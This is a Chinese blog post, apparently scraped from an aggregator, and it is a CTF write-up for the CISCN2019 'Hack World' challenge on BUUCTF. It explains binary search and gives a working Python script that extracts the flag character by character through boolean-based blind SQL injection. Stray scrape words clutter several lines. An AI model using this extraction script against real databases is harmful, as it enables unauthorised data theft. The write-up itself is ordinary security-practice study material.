简单的注入脚本
凉凉,数据结构没学好,二分法都忘了html
典型二分法
-
思路node
-
数据(data)为升序排序,要在data中寻找定值keypython
-
从中间的 data[mid]开始寻找sql
-
key大于data[mid] : 从data[mid+1]~data[end]数据结构key小于data[mid] : 从data[start]~data[mid-1]postkey等于data[mid] : 结束url
-
[CISCN2019 华北赛区 Day2 Web1]Hack World
复现平台在BUUCTFspa
<img src="https://files-cdn.cnblogs.com/files/thenbz3/buuoj-hackworld.bmp" width="200" hegiht="100" />code
import time
import requests
url = 'http://e208fef8-d158-4ae3-b566-0b6f9bdd4915.node1.buuoj.cn/'
flag = ''
for i in range(50):
#从33到126为可打印的字符
low = 33
height = 126
data = {'id':''}
while low <= height :
mid = (low + height) // 2
data['id'] = 'if(ascii(substr((select(flag)from(flag)),%d,1))>%d,1,2)'%(i,mid)
html = requests.post(url,data).text
time.sleep(1)
if 'Hello' in html :
low = mid + 1
else:
#将小于和等于的状况一块儿考虑,因此在low~mid中间寻找
height = mid
#出现low = height = mid,若不判断会进入死循环
if height == mid == low:
break
flag += chr(int(mid))
print(flag)
if(ascii(substr((select(flag)from(flag)),%d,1))>%d,1,2) Sql 注入 要学的骚操做不少,一条一条积累吧,等一有时间就把sqli-lab刷了 hhhhcdn
相关文章
- 1. 简单注入
- 2. 简单的SQL脚本
- 3. 简单的Shell脚本
- 4. es简单的脚本demo
- 5. linux 简单的shell脚本
- 6. 实验吧简单的SQL注入1,简单的SQL注入
- 7. Linux简单入门(十四)SHELL 脚本
- 8. tcl ,perl 脚本语言简单入门
- 9. XSS注入,js脚本注入后台
- 10. 简单的sql注入1
- 更多相关文章...
- • SQLite 注入 - SQLite教程
- • Spring DI(依赖注入)的实现方式:属性注入和构造注入 - Spring教程
- • Github 简明教程
- • TiDB 在摩拜单车在线数据业务的应用和实践
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章
- 1. 简单注入
- 2. 简单的SQL脚本
- 3. 简单的Shell脚本
- 4. es简单的脚本demo
- 5. linux 简单的shell脚本
- 6. 实验吧简单的SQL注入1,简单的SQL注入
- 7. Linux简单入门(十四)SHELL 脚本
- 8. tcl ,perl 脚本语言简单入门
- 9. XSS注入,js脚本注入后台
- 10. 简单的sql注入1